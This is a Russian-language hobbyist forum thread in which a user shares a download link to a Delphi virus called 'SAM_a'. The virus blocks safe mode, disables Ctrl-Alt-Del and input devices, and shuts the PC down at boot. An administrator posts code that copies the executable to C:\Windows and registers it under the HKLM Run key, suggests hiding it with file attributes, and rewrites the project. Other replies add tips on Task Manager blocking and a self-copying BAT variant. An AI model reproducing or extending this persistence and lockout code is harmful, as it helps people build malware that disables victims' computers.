|
Sam_A by JAW
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 00:15 | Сообщение # 1
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
Выкладываю исходник вируса: "SAM_a"
Функции:
--//Запрещает безопасный режим.(возможно неработает непроверял)
--//Отключает Ctr-Alt-Del.
--//Выключает ПК при загрузке.
--//Прописыватся в автозагрузке.
--//Отключает клавиатуру и мышь.(За эту функцию спасибо dolphin'у).
PS:В архиве исходники и *.EXE уже скомпилированый.
PSS:Хотел еще добавит функцию размножения по сети...но кому нужно тот сам добавит подумал я и нажпл "Enter"...
Ссылка на скачку>>>http://multi-up.com/70872
Сообщение отредактировал Jaw - Воскресенье, 22.03.2009, 00:17
|
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 11:49 | Сообщение # 2
|
Администратор
Сообщений: 902
Статус: Offline
|
Смотрел, код выглядит довольно не оптимизированным, и серьёзный твой косяк с автозагрузкой >>>
Ты не скопировался при запуске куданибудь, для вирусов это очень важно!Автозагрузка делается подругому кординально.
Ещё, можно обойтись без модуля и без таймера, это всё очень громоздко!
Скопироваться можно так>>>
Code
CopyFile(PChar(ParamStr(0)), PChar('C:\Windows\' + ExtractFileName(ParamStr(0))), True);
Прописать в автозагрузку себя скопированного>>>
Code
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',true);
Reg.WriteString('Project1','C:\Windows\Project1.exe');
Reg.CloseKey;
Reg.Free;
Вместо project1 пишешь название своей программы
P.S. Можно послать скопировавшемуся вирусу атребуты неводимый, только для чтения и т.п.
Удачной работы!!! 
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 12:04 | Сообщение # 3
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
чет напойму как скопироваться?а точнее куда вставлять этот код?
Сообщение отредактировал Jaw - Воскресенье, 22.03.2009, 12:06
|
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 12:11 | Сообщение # 4
|
|
Администратор
Сообщений: 902
Статус: Offline
|
В процедуру FormCreate Но при условии (if)!!! что файл не находится в указанноай дирекктории!
В ту же процедуру и при том же if прописываемся в автозагрузку.
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 12:13 | Сообщение # 5
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
можешь это исправить в моем проекте? |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 12:16 | Сообщение # 6
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Да, щас сделаем
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 12:21 | Сообщение # 7
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Тоько некак до меня не дойдёт для чего нужен этот код>>>
Code
Form1:=TForm1.Create(nil); //Создаём невидимую форму
Application.Run;
h:=CreateEvent(nil, true, false, 'et'); //Делаем пустое событие.
while (true) do //Пока не будет true
begin
WaitForSingleObject(h, 1000); //каждую секунду
Application.ProcessMessages; //передавать управление программе
end;
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 12:25 | Сообщение # 8
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
Это для последущего выключения ПК. |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 12:30 | Сообщение # 9
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Эта процедура не выключит компьютер, помоему она просто дает программы больше оперативной памяти
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 12:34 | Сообщение # 10
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
мб-мб.. |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 12:50 | Сообщение # 11
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Все процедуры я уже написал, осталось написать обработчик, эт не долго 
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 12:57 | Сообщение # 12
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
жду.. |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 13:29 | Сообщение # 13
|
|
Администратор
Сообщений: 902
Статус: Offline
|
В принцепе всё готово только заморочка насчет директории щас решу и всё 
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 13:53 | Сообщение # 14
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Посмотри что получилось, не уверен с действиями в реестре, но вроде всё так
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 14:08 | Сообщение # 15
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
+Отключение безопасного режима работает.
+Работает выключение после загрузки. |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 14:13 | Сообщение # 16
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Думаю моя помощь больше не понадобится?
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 14:16 | Сообщение # 17
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
Скорей всего да(всмысле непонадобится). |
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 14:21 | Сообщение # 18
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Да, Jaw, автозагрузка и вся программа будет работать лишь в том случае если имя екзишника будет Sam_A.exe
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
dolphin
|
Дата: Воскресенье, 22.03.2009, 14:22 | Сообщение # 19
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Имя программы 
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
|
|
|
Jaw
|
Дата: Воскресенье, 22.03.2009, 14:40 | Сообщение # 20
|
|
Участник
Зарегистрирован: 09.03.2009
Группа: Пользователи
Сообщений: 70
Статус: Offline
|
Я об этом уж догоадался..но всеровно спс. |
| |
|
|
|
|
|
tatsu
|
Дата: Суббота, 30.05.2009, 21:02 | Сообщение # 21
|
Частый гость
Зарегистрирован: 17.05.2009
Группа: Пользователи
Сообщений: 27
Статус: Offline
|
Люди ))))).... я такого зверька ма BAT`е делал. он самокопировался в system32, писался в реестр на автозагрузку, блочил реестр и уводил комп в циклическую перезагрузку.
Ибо маст дай!
|
| |
|
|
|
|
|
AD0
|
Дата: Суббота, 13.06.2009, 23:01 | Сообщение # 22
|
Группа: Удаленные
|
кстати с именем вопрос тоже можно решить) насколько мне помниться имя файла с * не задается в обычных форточках) а как имя для поиска без проблем можно попробовать=) так же помню в батниках если прописывать можно использовать как прямую ссылку и обычную свзяь там еще значками доллара обозначается
Сообщение отредактировал AD0 - Суббота, 13.06.2009, 23:15
|
| |
|
|
|
|
|
fren
|
Дата: Вторник, 17.11.2009, 13:52 | Сообщение # 23
|
Частый гость
Зарегистрирован: 12.12.2008
Группа: Пользователи
Сообщений: 34
Статус: Offline
|
оуу...и не знал что можно блокировать безопасный режим 
Можно пожалуйста по подробней про отключение безопасного режима...исходник скачать не могу...
Сообщение отредактировал fren - Вторник, 17.11.2009, 14:00
|
| |
|
|
|
|
|
xlin
|
Дата: Среда, 03.02.2010, 17:39 | Сообщение # 24
|
|
Группа: Удаленные
|
Одна неувязочка.... для того чтобы отключить диспетчер задач,ветку реестра необходимо поменять, и тогда все будет работать (reg.rootkey:=hkey_current_user;) |
| |
|
|
|
|
|
Marra_Kesh
|
Дата: Суббота, 15.05.2010, 08:50 | Сообщение # 25
|
Постоянный
Зарегистрирован: 19.12.2009
Группа: Модераторы
Сообщений: 182
Статус: Offline
|
Здраствуйте. Допустим я запустил этот вирус у себя на компьютере, он соответственно перезагружается и нет доступа к безопасному режиму. Что делать? Я читал как-то в Интернете что надо BIOS "выгружать" как это!!! Есть способ удалить этот вирус
Заведующий палатой #6
|
| |
|
|
|
